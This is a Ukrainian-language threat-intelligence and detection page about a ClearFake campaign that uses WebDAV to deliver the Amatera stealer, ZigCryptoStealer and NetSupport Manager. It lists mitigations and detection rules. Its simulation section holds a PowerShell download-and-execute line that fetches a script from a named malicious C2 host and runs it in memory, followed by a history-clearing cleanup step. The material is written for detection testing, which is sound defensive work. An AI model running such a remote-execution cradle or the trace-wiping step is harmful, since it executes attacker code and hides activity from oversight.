Ланцюг зараження ClearFake WebDAV доставляє Amatera stealer, ZigCryptoStealer та NetSupport Manager
Detection stack
- AIDR
- Alert
- ETL
- Query
Резюме
Кампанія, керована ClearFake, зловживає WebDAV та Cloudflare Workers для розповсюдження кількох шкідливих програм. Основний пейлоад, Amatera stealer, призначений для ексфільтрації облікових даних і даних, пов’язаних з криптовалютою. Додаткові пейлоади включають ZigCryptoStealer, доставлений через NativeAOT loader, і несанкціоновані екземпляри NetSupport Manager, використані для встановлення віддаленого доступу.
Розслідування
Cisco Talos розслідувало підозріле виконання DLL на основі WebDAV в українській урядовій організації. Аналіз виявив два окремих ланцюги інфекцій: один використовує pf.ch завантажувач для розгортання ZigCryptoStealer та зворотного проксі-сервера на Go, а інший використовує verification.google завантажувач для встановлення NetSupport Manager.
Пом’якшення наслідків
Організації повинні обмежити виконання з шляхів WebDAV та UNC та моніторити на аномальну поведінку rundll32.exe . Сильні контролі EDR повинні бути використані для виявлення технік, таких як DLL hollowing і module stomping. Команди безпеки також повинні моніторити несанкціоноване використання NetSupport Manager і підозрілу активність в мережах, пов’язаних з блокчейном.
Відповідь
Якщо виявлено шкідливу активність, уражені кінцеві точки повинні бути негайно ізольовані, щоб запобігти додатковій ексфільтрації даних. Респондери повинні проводити пам’яткову судову експертизу для виявлення присутнього шкідливого ПЗ, такого як Amatera. Команди безпеки також повинні шукати виконання DLL на основі WebDAV і незвичну активність PowerShell в середовищі.
Потік атак
Ми все ще оновлюємо цю частину.
Виявлення
Підозрілі рядки Powershell (через powershell)
LOLBAS Conhost (через cmdline)
Можливі індикатори обфускації Powershell (через powershell)
Можливе зловживання Telegram як каналу командування та управління (через dns_query)
Підозріле командування та управління за допомогою незвичайного DNS-запиту Top Level Domain (TLD) (через dns)
IOC (SourceIP) для виявлення: інфекційний ланцюг ClearFake WebDAV доставляє Amatera stealer, ZigCryptoStealer, та NetSupport Manager
IOC (DestinationIP) для виявлення: інфекційний ланцюг ClearFake WebDAV доставляє Amatera stealer, ZigCryptoStealer, та NetSupport Manager
C2 Комунікація через WebSocket Secure з Dubbedmuch для ексфільтрації даних [Проксі]
Виявлення завантаження та виконання скрипта PowerShell NetSupport Manager [Powershell Windows]
Виконання DLL WebDAV через rundll32.exe [Створення процесу Windows]
Виконання симуляції
Передумова: Телематика та перевірка базової лінії повинна пройти.
Пояснення: цей розділ детально описує точне виконання техніки суперника (TTP), розробленої для запуску правила виявлення. Команди та сюжет повинні безпосередньо відображати виявлені TTP і націлені на генерування точної телеметрії, яка очікується в логіці виявлення. Абстрактні або не пов’язані приклади приведуть до неправильного діагнозу.
-
Атака: Сценарій і Команди: Суперник симулює інфекційний ланцюг “ClearFake”. Мета – розгорнути засіб віддаленого доступу NetSupport Manager для встановлення стійкості та віддаленого контролю. Щоб уникнути детектування на основі сигнатур завантажень файлів, атака використовує “одноразову” команду PowerShell, що захоплює JavaScript/PowerShell навантаження з віддаленого C2 сервера (
https://kr.cedar2glanz.ru/jewel.js) та виконує його безпосередньо в пам’яті за допомогоюInvoke-Expression. Ця техніка залишає мінімальний слід на диску. -
Сценарій тесту регресії:
# Сценарій симуляції: Імітує виконання навантаження інфекційного ланцюга ClearFake # УВАГА: цей скрипт використовує специфічний шкідливий URL, визначений у правилі виявлення для створення сигналу тривоги. $maliciousUrl = "https://kr.cedar2glanz.ru/jewel.js" Write-Host "[+] Імітація зловмисного завантаження PowerShell та виконання..." -ForegroundColor Yellow # Ця команда імітує точний шаблон: URL + IEX/Invoke-Expression # Використовуємо блок try/catch, оскільки URL насправді недоступний/мертвий, # але КОМАНДНА ЛІНІЯ ПРОЦЕСУ все ще буде зафіксована. try { Invoke-Expression (New-Object Net.WebClient).DownloadString($maliciousUrl) } catch { Write-Host "[!] Команда виконана (Ожидается Network error, но должна быть згенерирована телеметрія)." -ForegroundColor Cyan } -
Команди очищення:
# Цей специфічний сценарій симуляції не створює файлів, оскільки це тест виконання в пам'яті. # Проте ми очищуємо історію команд, щоб видалити сліди з локальної користувацької сесії. Clear-History Write-Host "[+] Очищення завершено. Артефактів на диску не залишено." -ForegroundColor Green